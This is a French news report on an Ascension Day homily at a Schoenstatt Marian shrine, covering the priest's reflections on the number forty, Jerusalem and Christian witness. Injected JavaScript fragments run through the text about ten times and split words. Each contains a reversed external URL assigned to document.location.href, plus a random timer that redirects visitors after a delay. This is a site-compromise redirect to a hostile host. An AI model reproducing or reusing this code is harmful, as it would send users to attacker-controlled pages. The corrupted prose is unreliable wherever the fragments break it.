Le Seigneur Jésus Christ est allé au ciel pour nous préparer des places auprès du Père
L’ascension de notre Seigneur a été célébrée, au Sanctuaire Marial de la Paix et la Réconciliation de Schoenstatt du Mont Sion Gikungu, jeudi le 26 mai 2022 dans une homélie célébrée par l’Abbé Jean Marie Chadrac Nduwimana du Petit Séminaire de Kanyosha en présence de plusieurs pèlerins venus nombreux célébrer cette solennité. Le célébrant de la messe a tout d’abord salué les Pèlerins en leur souhaitant Joyeuse fête de Pâques et Bonne Fête de l’Ascension. Il a alors annoncé cette journée de joie puisque le Seigneur est allé préparer des places auprès du Père. C’est pourquoi les anges sont venus conforter les disciples et Jésus venait de toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner aux Apôtres la mission et leur ortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner de rester à Jérusalem jusque à ce qu’Il leur envoie l’Esprit Saint. Nous sommes venus alors annoncer la mort et la résurrection du Christ. Nous sommes appelés à témoigner pour Jésus Christ dans notre vie quotidienne, a fait savoir Abbé Jean Marie Chadrac. Les saintes écritures du jour ont été respectivement tirées : Première lecture : Ac1 ; 1-11 ; Psaume Responsorial: Ps 47, 2-3. 6-7. 8-9 ; deuxième lecture : He9, 24-28 ; 10, 19-23 et l’Évangile : Lc24, 46-53.
Dans son homélie, le célébrant de la messe a annoncé que cela faisait 40 jours après la célébration de Pâques dans la joie de la résurrection du Christ, puisque nous avons compris que nous n’avons pas suivi un charlatan. Cela faisait également 40 jours que le Christ nous était apparu, nous enseignant comme un Dieu tout puissant, guérissant les malades et ressuscitant les morts à la vie. Les 40 jours ont aussi toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné une promesse et ont renforcé la foi des chrétiens. Les 40 jours ont aidé à comprendre que Jésus est mort mais ressuscité. Le chiffre 40 n’est pas un fait de hasard a fait remarquer l’Abbé Nduwimana. En effet, dans l’Ancien Testament, les Israéliens ont passé 40 ans dans le désert pour tester leur foi, de même Moise est revenu vers les Israelites après avoir passé 40jours avec Dieu. Nous aussi, Jésus nous toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne la joie de briller de sa gloire pour entrer dans une vie nouvelle. Jésus Christ a passé 40 jours au désert pour être tenté par Satan et enfin vaincre, en définitive 40 jours de recevoir la victoire. L’Abbé Nduwimana a fait remarquer qu’arés la conception, l’enfant passe 40 semaines dans le sein de sa mère pour naitre comme une personne complète. Ce chiffre 40 signifie alors un nombre complet ce qui signifie qu’il est alors temps de quitter nos anciennes mauvaises habitudes pour commencer une vie nouvelle, la vie de joie puisque même les disciples, après que Jésus les ait bénis, ils sont restés dans la joie. Jésus nous a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnés naissance quand nous sommes à terme pour pouvoir témoigner pour Lui parmi nos frères, puisqu’ Il nous dit, « vous serez mes témoins » Ac1, 8 a-t-il fait savoir.
Après les 40 jours de miracles, il faut alors que nous allions annoncer cette Bonne Nouvelle, a recommandé l’Abbé Chadrac Nduwimana mais Jésus n’a pas dit aux disciples d’aller immédiatement l’annoncer à Pilate, Caiif et autres qui l’ont crucifié, mais plutôt d’attendre d’abord la venue de l’esprit Saint, l’esprit de force. Jésus connait nos faiblesses, il sait que Pierre l’a renié trois fois, il se rappelle que les autres disciples l’ont abantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné au moment de la passion à cause de la peur. C’est pourquoi nous avons besoin de la force pour témoigner parmi les païens. C’est ainsi qu’après la venue de l’esprit Saint, les Apôtres se sont levés d’eux-mêmes et ont bravement annoncé aux Juifs que Celui qu’ils avaient crucifié est vivant, comme cela sera médité au jour de Pentecôte, a annoncé l’Abbé Nduwimana. En plus Jésus n’a pas dit aux disciples d’aller se cacher chacun chez soi ou bien de se mettre ensemble et commencer à annoncer la Bonne Nouvelle en force, il leur a simplement demandé de rester à Jérusalem parce, dans la cité de Paix, il faut rester ensemble sinon chacun pourrait retourner dans la vie d’avant, comme d’ailleurs Pierre l’avait fait, retournant pêcher. En dehors de Jérusalem, il y a beaucoup de tentations, mais à Jérusalem ils restent dans la joie en priant dans la Paix du cœur. Jésus nous envoie alors aujourd’hui à Jérusalem, dans la cité de Dieu, puisque là où se trouve Dieu, c’est la Paix et la Joie. Dans la Maison de Dieu, règne la Paix, même quand Dieu semble être absent mais en dehors, on commence à commettre des péchés et vivre dans le regret. Si nous ne restons pas dans la Maison de Dieu, nous n’aurons jamais la Paix et les tentations seront toujours nombreuses. Restons alors à Jérusalem, dans la chambre haute, dans la Paix de Dieu, a recommandé le célébrant de messe. Dans la chambre haute on peut voir partout : chez Caiffa, Pilate, Golgotha, Gethsémani, le Mont des Oliviers, etc. C’est en effet là où Jésus a institué l’eucharistie. L’Abbé Nduwimana a ainsi incité les chrétiens à continuer à méditer les grands moments de la passion : la sueur de sang quand Pierre a renié Jésus, etc. A Jérusalem, dans la chambre haute, on peut aussi bien voir Golgotha qui se trouverait dans son cœur, a-t-il fait remarquer.
Ayez la joie puisque Jésus est mort pour nous sauver et soyez plutôt prêts à témoigner pour Lui en commençant par Jérusalem là où Il a été rejeté et crucifié, et aller proclamer « Celui que vous avez crucifié est Vivant », a-t-il interpellé. Nous devons commencer là où Jésus a conclu son travail, Jérusalem. Nous devons témoigner pour Jésus à Jérusalem là où on L’a renié après L’avoir reçu en pompe comme Fils de David. Il faut alors penser à toutes ces personnes victimes d’injustice comme les prisonniers à cause des calomnies, ces gens tués ci et là, etc. Nous devons aller témoigner aussi à Judée là où ses frères ont refusé de Le croire et il faut penser à tous ces gens baptisés, mais qui renient leur foi. Mais aussi nous devons témoigner à Samarie, le pays des païens, ces gens que les Juifs appellent « chiens » mais qui sont appelés à recevoir la Bonne Nouvelle pour que la Lumière soit partout. Le message est simple : annoncer que le Christ est mort et ressuscité, Il a vaincu le mal pour nous et Nous appelle à entrer dans la Demeure de Dieu sans crainte. Même si nous sommes toujours des pécheurs, Jésus s’est offert une seule fois pour nous obtenir le partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don. Soyons alors ses disciples, enseignons la Bonne Nouvelle, enseignons le partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don et la joie, Jésus a Vaincu et Il est toujours près de nous, a dit Abbé Jean Marie Chadrack.
Il a terminé l’homélie disant que Jésus n’est pas comme nous car il fait confiance en l’homme, ces hommes qu’ils L’ont rejeté le Vendredi Saint, Il sait que le Saint Esprit va nous fortifier. Toi jeune qui marche dans l’immoralité, Jésus sait que tu peux changer, tous ces gens qui se comportent mal, Jésus a confiance qu’ils changeront grâce à l’Esprit Saint et vivront une vie nouvelle, a-t- il rassuré. Il faut alors, en référence à la première Neuvaine par les Apôtres en l’attente de l’Esprit Saint, passer ces neuf jours qui viennent comme des Chrétiens nouveaux. C’est le Saint Esprit qui nous toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnera le pouvoir de témoigner sans peur dans notre vie de chaque jour, comme Pierre. Et de Prier la Vierge Marie pour qu’Elle continue à intercéder pour nous auprès de son Fils a -t-il conclu.
Rappelons que la messe était agrémentée par les danseuses et danseurs Intore, et animée par la Chorale Sainte Famille.
Fulgence Ndayizeye